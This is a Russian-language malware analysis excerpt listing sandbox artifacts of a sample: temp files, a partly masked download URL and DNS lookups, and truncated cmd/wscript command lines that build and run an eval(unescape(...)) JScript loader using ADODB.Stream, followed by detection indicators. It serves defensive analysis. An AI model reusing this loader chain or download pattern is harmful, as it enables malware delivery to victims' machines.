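Техническая информация
Ниже перечислены артефакты, зафиксированные при анализе образца: файлы в %TEMP%, сетевые обращения и командные строки запущенных процессов. Доменные имена частично замаскированы символами «#», а командные строки обрезаны («...»), поэтому для блок-листов и сигнатур в таком виде они непригодны — их нужно сверять с полным отчётом.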
- '%TEMP%\tmp235399.940'
- tmp235399.940
- %TEMP%\76782785.txt
- %TEMP%\tmp235399.940
- %TEMP%\silvan.cab
- %TEMP%\fluttering.dll
- %TEMP%\nswa831.tmp\system.dll
- http://www.ne####enadhanou.cz/nvdtime.prs
- DNS ASK ho##or.com
- DNS ASK ne####enadhanou.cz
- ClassName: '' WindowName: ''
- '<SYSTEM32>\wscript.exe' /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BbfsFL%3D%20%2891648%2C%22ne%22+%22w%20ActiveXObject%28%5C%22ADODB.Stream%5C%22%29%22%29%3BLPdYsEV%3D%20%2876738%2C%22%5C%5C%22+%22tmp23539...
- '<SYSTEM32>\cmd.exe' /c echo eval(unescape(WScript.Arguments(0))) > %TEMP%\76782785.TXT && timeout 3 && wscript /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BbfsFL%3D%20%2891648%2C%22ne%22+%22w%20ActiveXOb...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c echo eval(unescape(WScript.Arguments(0))) > %TEMP%\76782785.TXT && timeout 3 && wscript /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BbfsFL%3D%20%2891648%2C%22ne%22+%22w%20ActiveXOb...
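- '<SYSTEM32>\timeout.exe' 3

Пояснение к цепочке процессов выше: cmd.exe записывает в %TEMP%\76782785.TXT однострочный JScript-загрузчик eval(unescape(WScript.Arguments(0))), выжидает 3 секунды (timeout.exe) и запускает этот файл через wscript с ключом /E:JScript. Сам сценарий передаётся в URL-кодированном виде аргументом командной строки, то есть на диске остаётся только загрузчик. В видимой части аргумента после декодирования читается создание ActiveXObject("ADODB.Stream") и начало имени tmp23539…, что, по-видимому, соответствует файлу %TEMP%\tmp235399.940 из списка выше; остальная часть аргумента обрезана. Для обнаружения показательны запуск wscript.exe с /E:JScript для файла с расширением .txt из %TEMP%, дочерний процесс cmd.exe со скрытым окном и длинные %XX-последовательности в аргументах.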